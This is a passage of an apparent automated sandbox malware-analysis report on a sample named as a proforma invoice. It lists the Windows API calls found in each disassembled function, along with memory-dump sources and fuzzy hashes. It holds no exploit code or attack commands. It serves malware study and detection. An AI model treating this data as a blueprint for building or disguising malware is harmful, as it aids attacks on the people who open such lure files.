                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 003678AF
                                    • SysAllocString.OLEAUT32(?), ref: 003678BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: d37d573ac9e76656518fab8f406bcff38c52d682dbc1e5bce21080d6d23eafa1
                                    • Instruction ID: 551f4b57a1d058f8d629386a7b5c1dd0fbc010b1c092ebf3dd3503026f7a1c80
                                    • Opcode Fuzzy Hash: d37d573ac9e76656518fab8f406bcff38c52d682dbc1e5bce21080d6d23eafa1
                                    • Instruction Fuzzy Hash: 4221A131608204AFDB12AFB8DC8DDAA77ECEB09764B50C125F915CB2A5D670DC81CB74
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 003704F2
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0037052E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 82714dbadcde1ba5ba4dd117fdc5abe8b7ec7a9083639799ff176d23253a9adc
                                    • Instruction ID: 360706d6bb37a9fa42e581090c5eb437b9b938a41614a020b77bed159ce67ac5
                                    • Opcode Fuzzy Hash: 82714dbadcde1ba5ba4dd117fdc5abe8b7ec7a9083639799ff176d23253a9adc
                                    • Instruction Fuzzy Hash: 5521DD74504305EBDF369F28CC44A9A7BA8AF46734F208A19F8E9E62E0D7749940CF20
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 003705C6
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00370601
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 9c3201fc3f263bf4d62ea01e280dabc812f7e29955eb2126e72be22c8fe45ddb
                                    • Instruction ID: 8cfdf87f26fe4a988de32208d5bf9e6164957f511a333b2355abf52e8db586b6
                                    • Opcode Fuzzy Hash: 9c3201fc3f263bf4d62ea01e280dabc812f7e29955eb2126e72be22c8fe45ddb
                                    • Instruction Fuzzy Hash: C121AE75500305DBDB369F69CC54A9A77E8EF85730F208A1AF8A5E72E0D7B59860CB20
                                    APIs
                                      • Part of subcall function 0030600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0030604C
                                      • Part of subcall function 0030600E: GetStockObject.GDI32(00000011), ref: 00306060
                                      • Part of subcall function 0030600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030606A
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00394112
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0039411F
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0039412A
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00394139
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00394145
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 0131f41d19df79567ac929b254874198b6b0323c7b1e5b97c9c2c1f8ac35a22d
                                    • Instruction ID: 1ff9f687e5b247a0c2367ac9ab19e0f93e90db13094fad5ca8367b4e02abd088
                                    • Opcode Fuzzy Hash: 0131f41d19df79567ac929b254874198b6b0323c7b1e5b97c9c2c1f8ac35a22d
                                    • Instruction Fuzzy Hash: 241182B2150219BEEF129F64CC86EE77F5DEF09798F014111FA18A6190C6729C61DBA4
                                    APIs
                                      • Part of subcall function 0033D7A3: _free.LIBCMT ref: 0033D7CC
                                    • _free.LIBCMT ref: 0033D82D
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 0033D838
                                    • _free.LIBCMT ref: 0033D843
                                    • _free.LIBCMT ref: 0033D897
                                    • _free.LIBCMT ref: 0033D8A2
                                    • _free.LIBCMT ref: 0033D8AD
                                    • _free.LIBCMT ref: 0033D8B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                    • Instruction ID: 1a230f995f2c5f033ebaa5bfd1343c98a77b0b8ed8e4375ff5fafafd137f537d
                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                    • Instruction Fuzzy Hash: AB115E71940B14AAD623BFB0EC87FCB7BDCAF01700F400825B699AE292DB66B5158660
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0036DA74
                                    • LoadStringW.USER32(00000000), ref: 0036DA7B
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0036DA91
                                    • LoadStringW.USER32(00000000), ref: 0036DA98
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0036DADC
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 0036DAB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 4072794657-3128320259
                                    • Opcode ID: 775d04e7ba44626d4a85b22ac59939073b46caeefc93c73cbf5c5a8f4404bbb1
                                    • Instruction ID: 28edc63fc753eb595f64d20fac3658be277a29236856b950c7c789347f7df5db
                                    • Opcode Fuzzy Hash: 775d04e7ba44626d4a85b22ac59939073b46caeefc93c73cbf5c5a8f4404bbb1
                                    • Instruction Fuzzy Hash: BE016DF69142087FEB12EBE4DD89EEB366CEB08301F405497B746E2041EA749E848F74
                                    APIs
                                    • InterlockedExchange.KERNEL32(0124ED60,0124ED60), ref: 0037097B
                                    • EnterCriticalSection.KERNEL32(0124ED40,00000000), ref: 0037098D
                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 0037099B
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003709A9
                                    • CloseHandle.KERNEL32(00000000), ref: 003709B8
                                    • InterlockedExchange.KERNEL32(0124ED60,000001F6), ref: 003709C8
                                    • LeaveCriticalSection.KERNEL32(0124ED40), ref: 003709CF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: d4e51fa9e2d06f75c77a953b7b17316731cda37309eb08e922990bfbb19810c4
                                    • Instruction ID: 38d31e4187e33ee7ed3425bc4b3f729a7cb70b21f99efbdd6e30f7bfded01be3
                                    • Opcode Fuzzy Hash: d4e51fa9e2d06f75c77a953b7b17316731cda37309eb08e922990bfbb19810c4
                                    • Instruction Fuzzy Hash: 42F0CD31452912EBDB565BA4EE89AD67A39BF05702F802416F241508A1C776A465CFA0
                                    APIs
                                    • __allrem.LIBCMT ref: 003300BA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003300D6
                                    • __allrem.LIBCMT ref: 003300ED
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0033010B
                                    • __allrem.LIBCMT ref: 00330122
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00330140
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction ID: e4fc481187e596fa75f3edea16b63300dd9233dfb0523a374ca43c439d7b4f43
                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction Fuzzy Hash: 06813976A00B16AFE72A9F28DC91B6BB3F8AF41720F25423AF551DB681E770D9008750
                                    APIs
                                      • Part of subcall function 00383149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0038101C,00000000,?,?,00000000), ref: 00383195
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00381DC0
                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00381DE1
                                    • WSAGetLastError.WSOCK32 ref: 00381DF2
                                    • inet_ntoa.WSOCK32(?), ref: 00381E8C
                                    • htons.WSOCK32(?,?,?,?,?), ref: 00381EDB
                                    • _strlen.LIBCMT ref: 00381F35
                                      • Part of subcall function 003639E8: _strlen.LIBCMT ref: 003639F2
                                      • Part of subcall function 00306D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0031CF58,?,?,?), ref: 00306DBA
                                      • Part of subcall function 00306D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0031CF58,?,?,?), ref: 00306DED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 1923757996-0
                                    • Opcode ID: 7c3ffe24082e871c0e0272fb3c55dad2583a6fb80d5e621a01550af711c20b35
                                    • Instruction ID: 4d852e7aba5cb84ab6d1bfbd79c96cf0a3467fa66422b8d8db28dd7540a3370d
                                    • Opcode Fuzzy Hash: 7c3ffe24082e871c0e0272fb3c55dad2583a6fb80d5e621a01550af711c20b35
                                    • Instruction Fuzzy Hash: 53A1A031104340AFC326EF24C895F2AB7A9AF84318F558A8CF5565F2E2CB71ED46CB91
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003282D9,003282D9,?,?,?,0033644F,00000001,00000001,8BE85006), ref: 00336258
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0033644F,00000001,00000001,8BE85006,?,?,?), ref: 003362DE
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003363D8
                                    • __freea.LIBCMT ref: 003363E5
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    • __freea.LIBCMT ref: 003363EE
                                    • __freea.LIBCMT ref: 00336413
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: 39b438d09c79eb682a6b3e3e38ea2d7f0c899dd4de0207b6c8e43ba0bd0fb2bd
                                    • Instruction ID: 90cedf31cdbc15b4240eb7f9c51c69eff949bf95da3ca87b51b5ea0d333e6028
                                    • Opcode Fuzzy Hash: 39b438d09c79eb682a6b3e3e38ea2d7f0c899dd4de0207b6c8e43ba0bd0fb2bd
                                    • Instruction Fuzzy Hash: C251B072A00216BFEB278F64DCC2EAF77A9EB44760F168629FC05DA161DB35DC44C660
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 0038C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038B6AE,?,?), ref: 0038C9B5
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038C9F1
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA68
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038BCCA
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0038BD25
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038BD6A
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0038BD99
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0038BDF3
                                    • RegCloseKey.ADVAPI32(?), ref: 0038BDFF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 1120388591-0
                                    • Opcode ID: 2a922f1e2d7ec498cb2559e73066dfeb9bce6531c7b8887754a18d88920ee49b
                                    • Instruction ID: b64d0f85515514c8d04d0e9dad101f323560c372177691aefd2fac3ae6347250
                                    • Opcode Fuzzy Hash: 2a922f1e2d7ec498cb2559e73066dfeb9bce6531c7b8887754a18d88920ee49b
                                    • Instruction Fuzzy Hash: 0A817C30208341AFD716EF24C891E2ABBE9BF84308F14859DF4554B2A2DB31ED45CB92
                                    APIs
                                    • VariantInit.OLEAUT32(00000035), ref: 0035F7B9
                                    • SysAllocString.OLEAUT32(00000001), ref: 0035F860
                                    • VariantCopy.OLEAUT32(0035FA64,00000000), ref: 0035F889
                                    • VariantClear.OLEAUT32(0035FA64), ref: 0035F8AD
                                    • VariantCopy.OLEAUT32(0035FA64,00000000), ref: 0035F8B1
                                    • VariantClear.OLEAUT32(?), ref: 0035F8BB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCopy$AllocInitString
                                    • String ID:
                                    • API String ID: 3859894641-0
                                    • Opcode ID: 7693ef764277b42cf19dc94f7076da91837ee66d304abde8086779cf98119120
                                    • Instruction ID: 5b1e3af249bdef22c1bfb131574634bfd7a7a3888babd8c9a84dc75c48e3cedc
                                    • Opcode Fuzzy Hash: 7693ef764277b42cf19dc94f7076da91837ee66d304abde8086779cf98119120
                                    • Instruction Fuzzy Hash: 8951D431601310AFCF26AB65D895F29B3A8EF45312F249467ED05DF2A6DB708C84CB96
                                    APIs
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 003794E5
                                    • _wcslen.LIBCMT ref: 00379506
                                    • _wcslen.LIBCMT ref: 0037952D
                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00379585
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$FileName$OpenSave
                                    • String ID: X
                                    • API String ID: 83654149-3081909835
                                    • Opcode ID: a1e17d215e01b00c175fd7de371ebba5d0161d1566ee5e9b337f6e1c9826a9d7
                                    • Instruction ID: 3729453d5b0bf735a5bb4e9971b1a2d3c347ba0c4bfeb41a0635eeae71870adf
                                    • Opcode Fuzzy Hash: a1e17d215e01b00c175fd7de371ebba5d0161d1566ee5e9b337f6e1c9826a9d7
                                    • Instruction Fuzzy Hash: 98E1B4356043108FD726DF24C891B6AB7E4FF85314F058A6EF8899B2A2DB35DD05CB92
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • BeginPaint.USER32(?,?,?), ref: 00319241
                                    • GetWindowRect.USER32(?,?), ref: 003192A5
                                    • ScreenToClient.USER32(?,?), ref: 003192C2
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003192D3
                                    • EndPaint.USER32(?,?,?,?,?), ref: 00319321
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003571EA
                                      • Part of subcall function 00319339: BeginPath.GDI32(00000000), ref: 00319357
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 3050599898-0
                                    • Opcode ID: 3abec1d56a0f58272751eb7fadf32127bd831c413dc905c10595b6f507543ffa
                                    • Instruction ID: e7f84af49000c56db87c64dd66b0ebcc6e0cafc0d3ee667435f80314e4ff4c5e
                                    • Opcode Fuzzy Hash: 3abec1d56a0f58272751eb7fadf32127bd831c413dc905c10595b6f507543ffa
                                    • Instruction Fuzzy Hash: 2B419031105200AFD712DF64DCA5FBA7BBCEB49321F14066AF9A48B2B1C7319985DB61
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0037080C
                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00370847
                                    • EnterCriticalSection.KERNEL32(?), ref: 00370863
                                    • LeaveCriticalSection.KERNEL32(?), ref: 003708DC
                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003708F3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00370921
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3368777196-0
                                    • Opcode ID: 233630d4e105100ea541d16e4da12f71789013c33cda71aa7c7634218a4586aa
                                    • Instruction ID: 079692f7fdd64e7bd7635ea47d9e9c51467d62c4bbbf27f21afb7bf83b285766
                                    • Opcode Fuzzy Hash: 233630d4e105100ea541d16e4da12f71789013c33cda71aa7c7634218a4586aa
                                    • Instruction Fuzzy Hash: B7416D71900205EFDF1AAF54DC85AAA77B8FF04300F1480A5ED049E297D735EE54DBA4
                                    APIs
